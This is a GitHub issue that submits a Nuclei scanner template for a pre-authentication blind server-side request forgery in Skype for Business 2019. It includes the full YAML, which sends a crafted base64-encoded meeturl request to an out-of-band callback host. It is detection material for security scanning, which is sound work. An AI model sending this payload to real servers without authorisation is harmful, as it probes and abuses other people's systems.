### ISSUE TITLE
[nuclei-template] 

### ISSUE THREAD

**Issue by hateshape** [projectdiscovery/nuclei-templates#7725]
### Template Information:

**Information:** Skype for Business 2019 (SfB) is vulnerable to a Pre-Auth Server-side Request Forgery (SSRF). The issue is not tracked via CVE. Additionally, the issue is "Blind". I say "Blind" because 9/10 the resulting HTML within Skype does not embed/render the content from the SSRF. However, I have had multiple occasions where I have been able to load content as is the case with a non-blind SSRF. I have not been able to determine why this behavior happens.
**Reference:** <https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html>

### Nuclei Template:

```yaml
id: skype-blind-ssrf

info:
  name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery
  author: hateshape
  severity: medium
  description: Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability
  reference:
    - https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html
  tags: skype,blind-ssrf

variables:
  ssrfpayload: "https://{{interactsh-url}}/?id=POC%25{1337*1337}#.xx//"

requests:
  - raw:
      - |
        GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: word
        name: match-dns
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
      - type: word
        name: match-http
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
```

![image](https://github.com/projectdiscovery/nuclei-templates/assets/31131951/7f9d053f-1794-48e3-8dc6-f7c2895b6e85)
